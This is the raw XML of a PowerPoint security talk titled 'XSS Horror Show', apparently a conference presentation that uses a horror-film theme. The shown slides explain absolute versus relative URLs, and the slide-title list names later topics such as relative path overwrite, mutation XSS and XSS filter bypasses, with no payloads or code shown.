        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403648"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bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>ENDLESS SEQUELS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11" descr="tabjacking.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="20506578">
            <a:off x="1496032" y="1335805"/>
            <a:ext cx="6267450" cy="4819650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="548680"/>
            <a:ext cx="9325000" cy="6512396"/>
            <a:chOff x="0" y="548680"/>
            <a:chExt cx="9325000" cy="6512396"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12" descr="blood-splat3.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="548680"/>
              <a:ext cx="5067300" cy="3848100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13" descr="blood-splat3.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3419872" y="3212976"/>
              <a:ext cx="5067300" cy="3848100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Picture 14" descr="blood-splat4.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2771800" y="548680"/>
              <a:ext cx="6553200" cy="48387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THE SAW MOMENT</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="blood-splat2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"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r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unexpected twist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Clever thing you didn’t see coming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nobody thought of it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When it happens you enjoy it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It explains a lot</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="blood-splat3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"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4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4283968" y="3284984"/>
            <a:ext cx="6553200" cy="4838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Absolute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>urls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r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Absolute URLs are complete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Specify the full URL for the destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There is no guess work for the browser other than resolving the domain or protocol </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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relative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>urls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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Relative URLs are dependent on where you are in the document structure of the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The browser gets a URL based on where it thinks you are in the document structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There is guess work for the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I consider Relative URLs harmful</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>relative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>urls</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="blood-splat3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-972616" y="3789040"/>
            <a:ext cx="5067300" cy="3848100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="blood-splat4.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4283968" y="3284984"/>
            <a:ext cx="6553200" cy="4838700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="blood-splat2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="-2259632"/>
            <a:ext cx="6981825" cy="4924425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7" descr="zombie.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="1844824"/>
            <a:ext cx="4120589" cy="3890246"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528"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bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Have you visited a web site AND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descr="screenshot2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="3284984"/>
            <a:ext cx="6300192" cy="3397604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355976" y="2348880"/>
            <a:ext cx="4896544" cy="636551"/>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chemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>SOMETHING ISNT RIGHT</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1604</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>231</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XSS Horror Show</vt:lpstr>
      <vt:lpstr>About me</vt:lpstr>
      <vt:lpstr>Horror FILMS ARE LIKE SECURITY</vt:lpstr>
      <vt:lpstr>Horror FILMS ARE LIKE SECURITY</vt:lpstr>
      <vt:lpstr>THE SAW MOMENT</vt:lpstr>
      <vt:lpstr>Absolute urls</vt:lpstr>
      <vt:lpstr>relative urls</vt:lpstr>
      <vt:lpstr>relative urls</vt:lpstr>
      <vt:lpstr>relative urls</vt:lpstr>
      <vt:lpstr>Understanding the problem</vt:lpstr>
      <vt:lpstr>relative path overwrite</vt:lpstr>
      <vt:lpstr>Exploiting RPO</vt:lpstr>
      <vt:lpstr>Exploiting RPO</vt:lpstr>
      <vt:lpstr>Exploiting RPO</vt:lpstr>
      <vt:lpstr>Exploiting RPO</vt:lpstr>
      <vt:lpstr>Exploiting RPO</vt:lpstr>
      <vt:lpstr>Exploiting RPO</vt:lpstr>
      <vt:lpstr>Exploiting RPO</vt:lpstr>
      <vt:lpstr>Exploiting RPO</vt:lpstr>
      <vt:lpstr>Mutation XSS</vt:lpstr>
      <vt:lpstr>Mutation XSS</vt:lpstr>
      <vt:lpstr>Mutation XSS</vt:lpstr>
      <vt:lpstr>Mutation XSS</vt:lpstr>
      <vt:lpstr>Mutation XSS</vt:lpstr>
      <vt:lpstr>Mutation XSS</vt:lpstr>
      <vt:lpstr>Real world Mutation XSS</vt:lpstr>
      <vt:lpstr>Real world Mutation XSS</vt:lpstr>
      <vt:lpstr>Mutation XSS</vt:lpstr>
      <vt:lpstr>LEGacy IE bugs</vt:lpstr>
      <vt:lpstr>LEGacy IE bugs</vt:lpstr>
      <vt:lpstr>LEGacy IE bugs</vt:lpstr>
      <vt:lpstr>LEGacy IE bugs</vt:lpstr>
      <vt:lpstr>LEGacy IE bugs</vt:lpstr>
      <vt:lpstr>XSS Filter bypasses</vt:lpstr>
      <vt:lpstr>XSS Filter bypasses</vt:lpstr>
      <vt:lpstr>XSS Filter bypasses</vt:lpstr>
      <vt:lpstr>XSS Filter bypasses</vt:lpstr>
      <vt:lpstr>XSS Filter bypasses</vt:lpstr>
      <vt:lpstr>XSS Filter bypasses</vt:lpstr>
      <vt:lpstr>XSS Filter bypasses</vt:lpstr>
      <vt:lpstr>General XSS techniques</vt:lpstr>
      <vt:lpstr>General XSS techniques</vt:lpstr>
      <vt:lpstr>General XSS techniques</vt:lpstr>
      <vt:lpstr>General XSS techniques</vt:lpstr>
      <vt:lpstr>General XSS techniques</vt:lpstr>
      <vt:lpstr>THE end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XSS Horror Show</dc:title>
  <dc:creator>gareth</dc:creator>
  <cp:lastModifiedBy>chris</cp:lastModifiedBy>
  <cp:revision>209</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-08-08T11:00:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-05-20T16:59:42Z</dcterms:modified>
</cp:coreProperties>
</file>